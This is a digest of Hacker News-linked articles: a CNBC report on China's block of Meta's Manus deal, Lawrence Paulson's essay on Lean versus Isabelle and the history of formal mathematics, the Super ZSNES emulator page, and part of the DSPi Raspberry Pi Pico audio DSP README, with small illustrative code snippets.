![Meta buys Manus to scale AI agents across its platform](https://image.cnbcfm.com/api/v1/image/108246888-17671286231767128620-43248228984-1080pnbcnews.jpg?v=1767128622&w=750&h=422&vtcrop=y)

The Chinese government's intervention in the transaction drew [alarm among tech founders and venture capitalists](https://www.cnbc.com/2026/03/27/meta-manus-china-review-singapore-washing-model-regulation-.html) in the country who were hoping to take advantage of the so-called Singapore-washing model, where companies relocate from China to the city-state to avoid scrutiny from Beijing and Washington.

Manus was founded in China before relocating to Singapore. The company develops general-purpose AI agents and launched its first general [AI agent](https://www.cnbc.com/2025/12/29/ai-agentic-shopping-price-discounts-cheap-sales-commerce-visa-mastercard-chatbots.html) in March last year, which can execute complex tasks such as market research, coding and data analysis. The release saw the startup lauded as the next DeepSeek.

Manus said it had passed $100 million in annual recurring revenue, or ARR, in December, eight months on from launching a product, which it claimed made it the fastest startup in the world at the time to hit the milestone from $0.

The company raised $75 million in a round led by U.S. VC Benchmark in April last year.

When Meta announced the deal late last year, the tech giant said it would look to accelerate artificial intelligence innovation for businesses and integrate advanced automation into its consumer and enterprise products, including its Meta AI assistant.

But in January, China's Ministry of Commerce said it would conduct an assessment and investigation into how the acquisition complied with laws and regulations concerning export controls, technology import and export, and overseas investment.

When asked about China's move to block Meta's acquisition of Manus, APEC Senior Officials Meeting Chairman Chen Xu told reporters that it is "important that all parties act in a spirit of mutual benefit."

While Chen said he did not know the specifics of the issue, he said that "if such an issue can be handled properly, it can help facilitate more substantive discussions in APEC." That's according to an official English translation.

*— CNBC's Anniek Bao and Dylan Butts contributed to this story.*

---

## [HN-TITLE] 21. “Why not just use Lean?”

- **Source**: [https://lawrencecpaulson.github.io//2026/04/23/Why\_not\_Lean.html](https://lawrencecpaulson.github.io//2026/04/23/Why_not_Lean.html)
- **Site**: lawrencecpaulson.github.io
- **Submitter**: ibobev (Hacker News)
- **Submitted**: 2026-04-27 14:24 UTC (Hacker News)
- **HN activity**: 263 points · [181 comments](https://news.ycombinator.com/item?id=47922079)
- **Length**: 1.8K words (~8 min read)
- **Language**: en

23 Apr 2026

\[ [`AUTOMATH`](https://lawrencecpaulson.github.io/tag/AUTOMATH)  [`LCF`](https://lawrencecpaulson.github.io/tag/LCF)  [`HOL system`](https://lawrencecpaulson.github.io/tag/HOL_system)  [`HOL Light`](https://lawrencecpaulson.github.io/tag/HOL_Light)  [`Lean`](https://lawrencecpaulson.github.io/tag/Lean)  [`formalised mathematics`](https://lawrencecpaulson.github.io/tag/formalised_mathematics)  ]

I have been told that when proposing to formalise mathematics these days, you have to explain why you are not using Lean. And that reminds me why I left the dependent-typed world 40 years ago: its cultism, insularity and conformity. Lean is a great language with good tools, a large library and a huge, enthusiastic user community that has lately accomplished astounding things. But let’s not forget that the formalisation of mathematics goes back nearly 60 years. Amidst the hype around today’s progress, we must remember how we got here. It was not by people following the crowd.

### In the beginning, there was AUTOMATH

Part of the hype mentioned above is the frequent claim “Lean has made the formalisation of mathematics possible”. Sorry, we got there in 1968. NG de Bruijn’s [AUTOMATH](https://lawrencecpaulson.github.io/tag/AUTOMATH) already included most of the necessary ingredients. By 1977, Jutting had used it to formalise Landau’s *Foundations of Analysis*, which covers the construction of the complex numbers starting from pure logic. Jutting worked with equivalence classes and with sets of rational numbers. He formally proved the Dedekind completeness of the real number line. His accomplishment would not be matched for 20 years, despite vast advances in computer power. Finally, in the mid-90s, the real numbers were formalised again by John Harrison (using HOL Light) and Jacques Fleuriot (Isabelle/HOL).

I believe that almost anything that has been formalised today in any system could have been formalised in AUTOMATH. Its main drawbacks were its notation, which really was horrible, and its complete lack of automation. Proofs were long and unreadable.

And yet, for reasoning about equivalence classes, it is **still** probably better than Rocq. For while users of the latter rail against “setoid hell”, Jutting in his dissertation dispassionately describes his formalisation of equivalence classes. He even formalised one of Landau’s chapters a second time, adopting equivalence classes because he thought they were the right approach.

### And just after, there were Boyer and Moore

From a completely different corner came [the work of Robert Boyer, J Moore](https://doi.org/10.1007/s00165-019-00490-3) and their many colleagues. First announced in 1973 with the title “[Proving theorems about LISP functions](https://doi.org/10.1145/321864.321875)”, they set out their objective as the verification of code, not mathematics. Their “computational logic” has clear limitations for general mathematics, but this has not prevented its use in formalising a variety of deep results, ranging from [Gödel’s incompleteness theorem](https://www.cambridge.org/core/books/metamathematics-machines-and-godels-proof/B97649A08193300A18EA41D53FC87214) to [quadratic reciprocity](https://doi.org/10.1007/BF00263446) to the [Banach–Tarski theorem](https://doi.org/10.4230/LIPIcs.ITP.2022.5). The current incarnation is called ACL2 and it is chiefly applied to hardware verification. You can go far by being different.

### After LCF: Coq, HOL and Isabelle

The groundbreaking [Edinburgh LCF](https://lawrencecpaulson.github.io/2022/09/28/Cambridge_LCF.html) focused narrowly on programming language theory, but its idea of having a functional programming language as the *metalanguage* (hence ML) of a proof assistant had a broad impact. Groups in Cambridge, INRIA, Cornell and further afield built tools using ML, including early versions of HOL, Coq (now Rocq) and Nuprl. The HOL group was firmly fixated on hardware verification, but the need to verify floating point hardware brought with it a need for real analysis. Soon, [John Harrison had proved](https://doi.org/10.1007/978-1-4471-1591-5) some serious mathematics, such as the prime number theorem via Cauchy’s integral formula. He set himself the task of verifying as many of the famous [*100 theorems*](https://www.cs.ru.nl/~freek/100/) as possible, and HOL Light often tops the table. If Isabelle has sometimes surpassed HOL Light, it is because I stole so many of their formalisations.

By 2014, these systems had been used to formalise a string of advanced results. Here is a fairly arbitrary list:

- the [four colour theorem](https://www.ams.org/notices/200811/tx081101382p.pdf)
- the [odd order theorem](https://doi.org/10.1145/2480359.2429071)
- the [relative consistency](https://doi.org/10.1112/S1461157000000449) of the axiom of choice
- Gödel’s [second incompleteness theorem](https://rdcu.be/eSZwv)
- Tom Hales’ proof of the [Kepler conjecture](https://doi.org/10.1017/fmp.2017.1)

These theorems mostly had long and intricate proofs. Their formalisations, major pieces of work, were key to reducing any residual doubts about the theorems. And yet, few mathematicians were impressed. Notable exceptions were Dana Scott and Ken Kunen, both set theorists.

I know little about the development of Lean itself, but I know a bit about how it swept through the mathematical community. Mathematicians had noted dubiously that none of the proofs mentioned above involved the sort of sophisticated constructions that arise in mainstream mathematics: things such as Grothendieck schemes and perfectoid spaces. Tom Hales had the idea of building up a library of such definitions – just the definitions, never mind the proofs – and he chose Lean for that purpose. He spoke at the Newton Institute programme [Big Proof](https://www.newton.ac.uk/event/bpr/), where many similar ideas were discussed. Kevin Buzzard heard of this and decided to try out Lean for teaching. The rest is history.

A key act of the Lean community was to abandon the curious obsession with “constructive proofs” that had dominated Rocq for its entire existence. As I’ve discussed previously, the philosophy of [intuitionism](https://lawrencecpaulson.github.io/2021/11/24/Intuitionism.html) arose in the aftermath of Russell’s paradox. It had particular implications for the real numbers. While [Martin-Löf type theory](https://www.jstor.org/stable/37448) was recognisably an intuitionistic formalism, that’s not so clear for Rocq. And yet, paper after paper mentioned “constructive proof” where it was irrelevant and sometimes nonsensical. This obsession hindered the application of Rocq to mathematics, leaving the field to Lean.

### Not everything is “propositions as types”

[*Propositions as types*](https://lawrencecpaulson.github.io/2023/08/23/Propositions_as_Types.html) is a duality linking the logical signs $\forall$, $\exists$, $\to$, $\wedge$, $\vee$ with the type constructors $\Pi$, $\Sigma$, $\to$, $\times$, $+$. It is beautiful, fascinating and theoretically fruitful, but it is not the only game out there. I have seen “proof assistant” *defined* as a piece of software that checks proofs according to the principle of propositions as types. And just like that, most of the research of the past half century is wiped away. Nothing would be left except Rocq, Lean and [Agda](https://hackage.haskell.org/package/Agda) (which implements Martin-Löf type theory).

Even AUTOMATH is not an instance of propositions as types. Although it has versions of $\Pi$ and $\to$, you set up logic using axioms resembling those in any logic text. De Bruijn understood, 50 years ago, that the categories of types and propositions needed to be kept distinct for a number of reasons. Most obviously, the division operator would have to take three arguments, and the value of $x/y$ would actually depend on the proof that $y\not=0$. He noted that we must have *irrelevance of proofs*.

I have even heard well-informed people say “the LCF approach is the same thing as propositions as types”. This is quite untrue, and there’s [an entire blogpost](https://lawrencecpaulson.github.io/2022/01/05/LCF.html) trying to clear up this nonsense.

### LCF (again): we don’t need proof objects!

Both Rocq and Lean include the sort `Prop` of propositions. This provides proof irrelevance, and in particular, all proof objects for a given proposition evaluate to the same value. So these massive terms are unnecessary, but are kept anyway. Why?

That proof objects are unnecessary was [Robin Milner’s key discovery](https://lawrencecpaulson.github.io/2022/01/05/LCF.html) for LCF. All you need is a programming language (ML!) providing abstract data types. Put your proof kernel inside an abstract data type, with the inference rules at the constructors, and bingo! the proofs are checked dynamically. It is impossible to cheat thanks to ML’s abstraction barriers.
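
The kernel-as-abstract-type idea is easy to sketch. Below is a toy illustration in Python rather than ML (all names are mine, invented for illustration; note also that Python enforces abstraction only by convention, whereas ML's type system makes the barrier impossible to bypass):

```python
# Toy LCF-style kernel (illustrative only).  The only sanctioned way to
# obtain a Theorem is via the inference-rule functions below, so every
# Theorem is correct by construction and no proof object is ever stored.
# ML enforces this barrier with abstract types; Python only by convention.

class Atom:
    def __init__(self, name):
        self.name = name
    def __eq__(self, other):
        return isinstance(other, Atom) and self.name == other.name

class Implies:
    def __init__(self, a, b):
        self.a, self.b = a, b
    def __eq__(self, other):
        return isinstance(other, Implies) and (self.a, self.b) == (other.a, other.b)

_KERNEL = object()  # capability token standing in for ML's abstraction barrier

class Theorem:
    """Stores only its conclusion; the derivation is checked, then discarded."""
    def __init__(self, concl, token=None):
        if token is not _KERNEL:
            raise ValueError("theorems can only be built by inference rules")
        self.concl = concl

def axiom(formula):
    # toy axiom rule, standing in for a real kernel's primitive inference rules
    return Theorem(formula, _KERNEL)

def modus_ponens(ab, a):
    # from |- A -> B and |- A, conclude |- B
    if not (isinstance(ab.concl, Implies) and ab.concl.a == a.concl):
        raise ValueError("modus_ponens: rule does not apply")
    return Theorem(ab.concl.b, _KERNEL)
```

Here `modus_ponens` checks the rule's side condition at the moment the theorem is constructed, which is exactly the dynamic checking described above: the inference rules sit at the constructors, and nothing else can forge a `Theorem`.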

I once had the surreal experience of trying to explain this 50-year-old idea to somebody from the propositions as types world. This was no student but one of the world’s leading experts on functional programming, someone for whom the origin story of the ML language should be core knowledge. It took quite a while and I don’t think he was convinced: an example of the insularity that I mentioned above.

It is nuts, in the age of [RAMmageddon](https://www.nature.com/articles/d41586-026-00844-x), to waste tens of megabytes on giant terms that denote nothing. There is even research into making these useless things elegant.

### Why should you use Isabelle?

Let’s get the obvious out of the way first: if your colleagues are using Lean, they have expertise in Lean, and if your key prerequisites are in the Lean libraries, of course you should use Lean.

But if you are free to choose, a key purpose of this blog is to give you reasons to consider Isabelle. They include

- **the best automation anywhere**. Don’t be fooled by people talking about “hammers” as everyday things: there is nothing comparable to sledgehammer. Plus much more. I also need to write about computer algebra.
- **the best choice for legibility**. This blog presents [numerous examples](https://lawrencecpaulson.github.io/tag/Isar).
- **no dependent types**, so no universe levels and none of the quirks that trap beginners. Remember, dependent types are discouraged in Lean’s mathlib and in Rocq’s SSReflect and Mathematical Components.

A key difficulty with dependent types is that, if done properly, type checking must be undecidable. That's because equality is undecidable, and in the early days, this fact was taken for granted. However, around 1990, the consensus shifted. To make type checking decidable, equality was downgraded to *definitional* or *intensional* equality. This is why $T(N+1)$ and $T(1+N)$ are different types. This limitation has real repercussions for proofs, and yet testing definitional equality is (still!) a heavy computational burden.
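
A two-line Lean 4 example (my own, not from the post) makes the point concrete: `n + 1` reduces to `Nat.succ n`, but `1 + n` does not reduce when `n` is a variable, so the two types are propositionally but not definitionally equal:

```lean
-- `rfl` fails here: `Fin (n + 1)` and `Fin (1 + n)` are not definitionally
-- equal, so we must rewrite with the propositional theorem `Nat.add_comm`.
example (n : Nat) : Fin (n + 1) = Fin (1 + n) := by
  rw [Nat.add_comm]
```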

To be fair, if you’d asked me back in 2017 what sort of mathematics Isabelle could handle, I’d have been much more cautious. It’s easy to imagine that dependent types are necessary to handle such things as

- [field extensions](https://rdcu.be/cIK3W)
- [p-adic numbers](https://www.isa-afp.org/entries/Padic_Field.html)
- [Grothendieck schemes](https://doi.org/10.1080/10586458.2022.2062073)

But a bunch of us [did some research](https://www.cl.cam.ac.uk/~lp15/Grants/Alexandria/) and learned a lot. The trick is to stop forcing everything to be a type.

### To the future

Lean gets a lot of things right. And Lean has the potential to be legible, even supporting nested proof blocks. Now its user community must take advantage of these features, as Isabelle users are mostly doing already. The ultimate transparency is not a proof object that a computer can check but a proof text that a human being can actually read.

The rise of AI is making these differences starker. AI proofs tend to be messy, but it’s easy to tidy them using sledgehammer. Since they are nicely structured – in my limited experience, using Claude – they are legible despite their often excessive detail. You can see what is going on and look for ways to simplify them. There is also [recent research](https://arxiv.org/abs/2604.07455) where the language models themselves call sledgehammer. Finally, AI can easily translate legible structured proofs from one proof assistant to another. Then, you no longer need to worry about which one you choose.

*\[Many thanks to Wenda Li for comments!]*

### Mizar, with apologies

*\[Added 15 April 2026]*

Somehow, I forgot Mizar again. No history of the formalisation of mathematics is complete without a discussion of [Mizar](https://mizar.uwb.edu.pl) and its extensive [mathematical library](https://mizar.uwb.edu.pl/library/). Making the omission worse, Isabelle’s Isar language borrows heavily from Mizar. My next blogpost will be about Mizar, I promise!

---

## [HN-TITLE] 22. Super ZSNES – GPU Powered SNES Emulator

- **Source**: [https://zsnes.com/](https://zsnes.com/)
- **Site**: zsnes.com
- **Submitter**: haunter (Hacker News)
- **Submitted**: 2026-04-27 17:50 UTC (Hacker News)
- **HN activity**: 252 points · [69 comments](https://news.ycombinator.com/item?id=47924877)
- **Length**: 428 words (~2 min read)
- **Language**: en

## Welcome to SUPER ZSNES

The two original developers of ZSNES are finally back together! Introducing SUPER ZSNES! Re-written completely from scratch, this GPU-powered SNES emulator is here to bring you the following: some of what is familiar, some of what's new, and then some of what goes beyond.

## Key Features

- Far more accurate CPU and Audio cores than the original ZSNES
- GPU-powered PPU core to allow for hi-res Mode 7 and special per-game enhancement features
- Classic UI with falling snow, modernized with higher definition and improved UX
- Fast forward, rewind, save states, auto save history, save bookmarks, cheat codes, quick load, and more
- No Vibe Coding. Classic development style.
- Super Enhancement Engine, where the ZSNES developers are enhancing the games one at a time

## Super Enhancement Engine

Currently implemented with support for 7 popular games. Support for more games will be added as development of the emulator continues.

- **High Resolution** - Not just an auto upscaler: an internal drawing program is used to make sure that the higher resolution details can be manually drawn to look nice and crisp.
- **Texture/Normal Map** - Adds some nice details to the backgrounds to give them a higher resolution look.
- **Overclock** - Select games that are prone to slowdown are overclocked.
- **Wide Screen** (where available) - We enable widescreen whenever the game is internally coded to support partial or full widescreen.
- **Uncompressed Audio Replacement** - We curate and pick uncompressed audio samples to replace original highly compressed audio samples.
- **3D** - Currently only supported on perspective-style Mode 7, replaces tiles with 3D height mapped data.
- All enhancements can be individually disabled to suit your play style.

Note: Enhancement data contains no ROM or copyrighted data. You will need to provide the ROMs. Do not ask the developers for ROMs.

## Downloads

### iOS

Coming Soon

## What's Coming

- Bug fixes
- Special chip emulation (DSP1, SuperFX, etc.)
- More optimization work
- More types of enhancements
- Netplay
- Other features

## Notes & Legal

This is an early build, so there are still emulation bugs and special chips (DSP1, SuperFX, etc.) have yet to be implemented. A bunch of optimization work has yet to be done so performance may be a bit slow.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

The SUPER ZSNES Team is not connected or affiliated with any mentioned company in any way. Companies and all products pertaining to that company are trademarks of that company. Please contact that company for trademark and copyright information.

---

## [HN-TITLE] 23. Fully Featured Audio DSP Firmware for the Raspberry Pi Pico

- **Source**: [https://github.com/WeebLabs/DSPi](https://github.com/WeebLabs/DSPi)
- **Site**: GitHub
- **Submitter**: BoingBoomTschak (Hacker News)
- **Submitted**: 2026-04-25 13:28 UTC (Hacker News)
- **HN activity**: 267 points · [77 comments](https://news.ycombinator.com/item?id=47901433)
- **Length**: 5.8K words (~26 min read)
- **Language**: en

**DSPi** transforms a Raspberry Pi Pico or other RP2040-based board into a very competent and inexpensive little digital audio processor. It acts as a USB sound card with an onboard DSP engine, allowing you to make use of essential tools like room correction, active crossovers, parametric EQ, time alignment, loudness compensation, and headphone crossfeed.

It is my hope that the RP2040 and RP2350 will garner a reputation as the "swiss army knife of audio for less than a cup of coffee".

Feel free to join the [official Discord server](https://discord.gg/RCyqxAQ5xS) for development updates, discussion or to request assistance!

* * *

## Table of Contents

- [Key Capabilities](#key-capabilities)
- [Platform Support](#platform-support)
- [Audio Signal Chain](#audio-signal-chain)
- [Hardware Setup](#hardware-setup)
- [DSP Features](#dsp-features)
  
  - [Matrix Mixer](#matrix-mixer)
  - [Parametric Equalization](#parametric-equalization)
  - [Loudness Compensation](#loudness-compensation)
  - [Headphone Crossfeed](#headphone-crossfeed)
  - [Volume Leveller](#volume-leveller)
  - [Per-Channel Preamp](#per-channel-preamp)
  - [Master Volume](#master-volume)
  - [I2S Output](#i2s-output)
  - [Subwoofer PDM Output](#subwoofer-pdm-output)
- [User Presets](#user-presets)
- [Developer Reference](#developer-reference)
  
  - [System Architecture](#system-architecture)
  - [Performance Tuning](#performance-tuning)
  - [USB Control Protocol](#usb-control-protocol)
  - [System Telemetry](#reqgetstatus-0x50---system-telemetry)
  - [Data Structures](#data-structures)
- [Building from Source](#building-from-source)
- [Detailed Specifications](#detailed-specifications)
- [License](#license)

* * *

## Key Capabilities

- **USB Audio Interface:** Plug-and-play under macOS, Windows, Linux, and iOS. Supports 16-bit and 24-bit PCM input at 44.1, 48, and 96 kHz.
- **24-bit S/PDIF or I2S Outputs:** Up to four independent stereo output slots (8 channels on RP2350, 4 channels on RP2040). Each slot can be switched at runtime between S/PDIF and I2S, enabling direct connection to any standard DAC. I2S slots share a common BCK/LRCLK and can optionally produce a 128×/256× master clock.
- **Per-Channel Preamp:** Independent gain control for each USB input channel (L/R), applied as PASS 1 of the DSP pipeline before any other processing.
- **Matrix Mixer:** Route either or both USB input channels to any output with independent gain and phase invert per crosspoint. 2x9 on RP2350, 2x5 on RP2040.
- **Parametric Equalization:** Up to 10 PEQ bands per channel with 6 filter types. 110 total filter bands on RP2350, 70 on RP2040. RP2350 uses a hybrid SVF/biquad architecture for superior low-frequency accuracy.
- **Volume Leveller:** RMS-based, stereo-linked, soft-knee upward compressor that lifts quieter content toward a target level without ever amplifying loud passages. Optional 10 ms lookahead, configurable speed and max-gain ceiling, with a -6 dBFS gain-reduction safety limiter.
- **Loudness Compensation:** Volume-dependent EQ based on the ISO 226:2003 equal-loudness contour standard. Automatically boosts bass and treble at low listening levels to maintain perceived tonal balance.
- **Headphone Crossfeed:** BS2B-based crossfeed with interaural time delay (ITD) reduces unnatural stereo separation for headphone listening. Three classic presets plus fully custom parameters.
- **Master Volume:** Device-side output ceiling (-128 to 0 dB, with a true-mute sentinel) applied at the very end of the signal chain, independent of USB host volume and DSP processing. Two persistence modes: stored independently of presets (default — survives reboots, unaffected by preset switching) or saved/restored as part of each preset.
- **Per-Output Gain & Mute:** Independent gain and mute controls for each output channel.
- **Time Alignment:** Per-output delay (up to 85ms) for speaker/subwoofer alignment with automatic latency compensation between S/PDIF/I2S and PDM output paths.
- **Subwoofer Output:** Dedicated mono PDM output channel with a high-performance 2nd-order delta-sigma modulator, enabling direct subwoofer output without the need for a second DAC.
- **Dual-Core DSP:** EQ processing is split across both cores on both platforms for maximum throughput when multiple outputs are active.
- **Configurable Output Pins:** All output GPIO pins (including I2S BCK/MCK) can be reassigned at runtime to suit custom PCB layouts, no reflashing required.
- **10-Slot Preset System:** Save, load, and manage up to 10 complete DSP configurations with user-defined names. Includes per-channel naming, configurable startup slot, and bulk parameter transfer for fast state synchronization.
- **Diagnostics:** Per-channel peak/clip metering, USB PHY error counters (CRC, bit-stuff, timeout, overflow, sequence), buffer fill statistics, S/PDIF DMA starvation counters per output slot, and CPU load reporting per core.
- **Firmware Update via USB:** A vendor command reboots the device into the UF2 bootloader, allowing the host app to push new firmware without a physical BOOTSEL press.
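
The subwoofer path above depends on a 2nd-order delta-sigma modulator to turn PCM samples into a 1-bit PDM stream. A minimal floating-point sketch of one classic textbook topology follows (the integrator structure and coefficients here are a common textbook choice, not necessarily what DSPi's high-performance modulator implements):

```python
def pdm_modulate(samples):
    """2nd-order delta-sigma modulator: returns a +/-1.0 bitstream whose
    short-term average tracks the input.  Keep the input well inside
    +/-1.0 (say, +/-0.8) or a 2nd-order single-bit loop can go unstable."""
    v1 = v2 = 0.0   # the two integrator states
    y = 0.0          # previous 1-bit output (fed back into both integrators)
    bits = []
    for x in samples:
        v1 += x - y          # first integrator, unit feedback
        v2 += v1 - 2.0 * y   # second integrator, doubled feedback for stability
        y = 1.0 if v2 >= 0.0 else -1.0   # 1-bit quantizer
        bits.append(y)
    return bits
```

Averaging the bitstream (which is what the analog low-pass filter does) recovers the input: a constant input of 0.25 yields a stream whose mean settles near 0.25, with the quantization error pushed up to high frequencies.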

* * *

## Platform Support

| Feature | RP2040 (Pico) | RP2350 (Pico 2) |
| --- | --- | --- |
| **System Clock** | 307.2 MHz (overclock) | 307.2 MHz |
| **Core Voltage** | 1.15 V | 1.15 V |
| **Sample Rates** | 44.1 / 48 / 96 kHz | 44.1 / 48 / 96 kHz |
| **Audio Processing** | Q28 Fixed-Point | Single-Precision Float |
| **EQ Bands** | 10 per channel (70 total) | 10 per channel (110 total) |
| **Total Channels** | 7 (2 master + 4 S/PDIF·I2S + 1 PDM) | 11 (2 master + 8 S/PDIF·I2S + 1 PDM) |
| **Output Slots** | 2 stereo (each S/PDIF or I2S) | 4 stereo (each S/PDIF or I2S) |
| **Output Bit Depth** | 24-bit | 24-bit |
| **PDM Output** | 1 (subwoofer) | 1 (subwoofer) |
| **Max Delay** | 85 ms per output | 85 ms per output |
| **Math Engine** | Hand-optimized ARM Assembly | Hardware FPU (hybrid SVF/biquad EQ) |
| **Dual-Core EQ** | Yes (Core 1 processes outputs 3-4) | Yes (Core 1 processes outputs 3-8) |
| **User Presets** | 10 slots | 10 slots |
| **Status** | Production | Production |

Both platforms are fully tested and production-ready. The RP2040 reaches 307.2 MHz with a slight voltage bump; the RP2350 hits the same frequency at the same voltage. Clock is fixed (no rate-dependent switching), and PIO dividers are integer at every supported sample rate. The RP2350 offers significantly more processing headroom thanks to its hardware floating-point unit, enabling more output channels and a hybrid SVF/biquad filter architecture for improved low-frequency accuracy.
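
For readers unfamiliar with the Q28 format in the table above: samples are stored as 32-bit integers with 28 fractional bits, so a multiply needs a wide intermediate product followed by a 28-bit arithmetic shift. A minimal sketch of the arithmetic in Python (function names are mine, not taken from the firmware):

```python
Q = 28            # fractional bits in the Q28 format
ONE = 1 << Q      # the value 1.0 in Q28

def to_q28(x: float) -> int:
    """Convert a float to Q28 fixed point."""
    return int(round(x * ONE))

def q28_mul(a: int, b: int) -> int:
    """Q28 multiply: wide product, then drop the extra 28 fractional bits.
    Python's >> on negative ints floors, matching an arithmetic shift."""
    return (a * b) >> Q

def from_q28(x: int) -> float:
    """Convert Q28 fixed point back to a float."""
    return x / ONE
```

For example, `from_q28(q28_mul(to_q28(0.5), to_q28(-0.25)))` gives `-0.125`. On the RP2040 (no FPU) this integer pipeline is what makes real-time EQ feasible; the RP2350's hardware FPU lets it use single-precision floats instead.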

* * *

## Audio Signal Chain

DSPi processes audio in a linear, low-latency pipeline:

**RP2350 (11 channels, 9 outputs):**

```
USB Input (16/24-bit PCM Stereo, 44.1 / 48 / 96 kHz)
    |
PASS 1: Per-Channel Preamp (independent L/R gain) + USB Volume
    |
PASS 2: Master EQ (10 bands per channel, Left/Right)
    |
PASS 2.5: Volume Leveller (RMS upward compression, optional)
    |
PASS 3: Headphone Crossfeed (BS2B + ITD, optional) + Master Peak Metering
    |
        Loudness Compensation (volume-dependent EQ, optional)
    |
PASS 4: Matrix Mixer (2 inputs x 9 outputs, per-crosspoint gain & phase)
    |
PASS 5: Per-Output EQ -> Gain/Mute -> Delay -> Output Gain × Master Volume
    |
    +-- Out 1-2 --> S/PDIF or I2S slot 0 (data: GPIO 6 default)
    +-- Out 3-4 --> S/PDIF or I2S slot 1 (data: GPIO 7 default)
    +-- Out 5-6 --> S/PDIF or I2S slot 2 (data: GPIO 8 default)
    +-- Out 7-8 --> S/PDIF or I2S slot 3 (data: GPIO 9 default)
    +-- Out 9   --> PDM Sub               (data: GPIO 10 default)
                  (I2S BCK/LRCLK shared on GPIO 14/15 default; optional MCK on GPIO 13 default)
```

**RP2040 (7 channels, 5 outputs):**

```
USB Input (16/24-bit PCM Stereo, 44.1 / 48 / 96 kHz)
    |
PASS 1: Per-Channel Preamp + USB Volume
    |
PASS 2: Master EQ (10 bands per channel, Left/Right)
    |
PASS 2.5: Volume Leveller (RMS upward compression, optional)
    |
PASS 3: Headphone Crossfeed (BS2B + ITD, optional) + Master Peak Metering
    |
        Loudness Compensation (volume-dependent EQ, optional)
    |
PASS 4: Matrix Mixer (2 inputs x 5 outputs, per-crosspoint gain & phase)
    |
PASS 5: Per-Output EQ -> Gain/Mute -> Delay -> Output Gain × Master Volume
    |
    +-- Out 1-2 --> S/PDIF or I2S slot 0 (data: GPIO 6 default)
    +-- Out 3-4 --> S/PDIF or I2S slot 1 (data: GPIO 7 default)
    +-- Out 5   --> PDM Sub               (data: GPIO 10 default)
                  (I2S BCK/LRCLK shared on GPIO 14/15 default; optional MCK on GPIO 13 default)
```
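
The matrix-mixer pass (PASS 4) in both diagrams is conceptually simple: each output is a gain-weighted, optionally phase-inverted sum of the two USB input channels. A sketch of one sample's worth of mixing in Python (the data layout and names are assumptions for illustration, not taken from the source):

```python
def matrix_mix(left: float, right: float, crosspoints):
    """One sample through a 2xN matrix mixer.

    crosspoints[out] is a pair of (enabled, gain_db, invert) tuples,
    one for the L input and one for the R input at that output."""
    outs = []
    for l_cfg, r_cfg in crosspoints:
        acc = 0.0
        for sample, (enabled, gain_db, invert) in ((left, l_cfg), (right, r_cfg)):
            if enabled:
                g = 10.0 ** (gain_db / 20.0)       # dB -> linear gain
                acc += (-sample if invert else sample) * g
        outs.append(acc)
    return outs
```

A typical use is a mono subwoofer feed: one output row with both crosspoints enabled at -6 dB sums L and R without clipping headroom, while a phase-invert flag on one crosspoint yields a difference (side) signal instead.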

### Signal Chain Details

01. **Input (USB):** 16-bit or 24-bit PCM stereo audio at 44.1, 48, or 96 kHz. Bit depth is selected via USB alt setting; sample rate via the USB Audio Class rate-set request.
02. **Per-Channel Preamp (PASS 1):** Independent gain control for the USB Left and Right input channels in dB. Applied at the very start of the DSP chain so its setting affects all downstream processing.
03. **Master EQ (PASS 2):** Up to 10 bands of parametric EQ per channel (Left/Right). Supports peaking, low shelf, high shelf, low pass, and high pass filter types.
04. **Volume Leveller (PASS 2.5):** Optional feedforward, stereo-linked, single-band RMS compressor with soft-knee upward compression — quieter content is boosted toward a target level while content above the threshold passes through untouched. Configurable speed, max-gain ceiling, and noise gate. Optional 10 ms lookahead. A -6 dBFS gain-reduction safety limiter prevents output overshoots.
05. **Headphone Crossfeed (PASS 3):** Optional BS2B crossfeed that mixes a filtered, delayed portion of each channel into the opposite channel. Uses a complementary filter design with interaural time delay (ITD) via an all-pass filter. Three presets (Default, Chu Moy, Jan Meier) plus custom frequency and feed level. ITD can be independently toggled. Master peak metering taps into this stage.
06. **Loudness Compensation:** Optional ISO 226:2003 equal-loudness EQ that adapts to the current volume level. At low volumes, bass and treble are boosted to compensate for the ear's reduced sensitivity. Configurable reference SPL and intensity. Driven by the USB host volume position so it remains correct regardless of master-volume attenuation downstream.
07. **Matrix Mixer (PASS 4):** Routes the two USB input channels (Left/Right) to all output channels. Each crosspoint has independent enable, gain (-inf to +12 dB), and phase invert. Outputs can be individually enabled/disabled to save CPU. RP2350 has a 2x9 matrix (9 outputs), RP2040 has a 2x5 matrix (5 outputs).
08. **Output EQ (PASS 5):** Independent 10-band EQ per output channel on both platforms. Ideal for crossover filters and per-driver correction. On RP2350, filters below Fs/7.5 use SVF topology for superior low-frequency accuracy; higher frequencies use traditional biquad.
09. **Per-Output Gain & Mute:** Independent gain (-inf to +12 dB) and mute for each output channel.
10. **Time Alignment:** Per-output delay for speaker alignment, up to 85 ms (4096 samples at 48 kHz). Automatic latency compensation between S/PDIF/I2S and PDM output paths.
11. **Master Volume:** Device-side output ceiling, -128 to 0 dB with a true-mute sentinel at -128. Folded into the per-output multiplier at PASS 5 so it's effectively free CPU-wise. Independent of the USB host volume — the two multiply together. Does not affect loudness-compensation behavior.
12. **Outputs:** Each numbered slot is configurable as either 24-bit S/PDIF or 24-bit I2S (left-justified, MSB-first). I2S slots share a common BCK/LRCLK clock pair (LRCLK is always BCK + 1 due to a PIO side-set constraint). An optional master clock (MCK) at 128× or 256× Fs can be routed to a separate GPIO. PDM subwoofer is always on its own dedicated output and pin.
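
The EQ stages above (PASS 2 and PASS 5) are built from second-order sections. For the common peaking type, the standard coefficient recipe is the RBJ "Audio EQ Cookbook"; here is a Python sketch of one band (illustrative only: DSPi's actual implementation uses fixed-point or hybrid SVF/biquad variants, as described above):

```python
import math

def peaking_biquad(fs, f0, gain_db, q):
    """RBJ Audio EQ Cookbook peaking filter, normalized so a0 == 1.
    Returns (b, a) coefficient lists for a second-order section."""
    A = 10.0 ** (gain_db / 40.0)
    w0 = 2.0 * math.pi * f0 / fs
    alpha = math.sin(w0) / (2.0 * q)
    a0 = 1.0 + alpha / A
    b = [(1.0 + alpha * A) / a0, -2.0 * math.cos(w0) / a0, (1.0 - alpha * A) / a0]
    a = [1.0, -2.0 * math.cos(w0) / a0, (1.0 - alpha / A) / a0]
    return b, a

def biquad_process(b, a, x, state):
    """Process one sample through a Direct Form II transposed biquad."""
    s1, s2 = state
    y = b[0] * x + s1
    s1 = b[1] * x - a[1] * y + s2
    s2 = b[2] * x - a[2] * y
    return y, (s1, s2)
```

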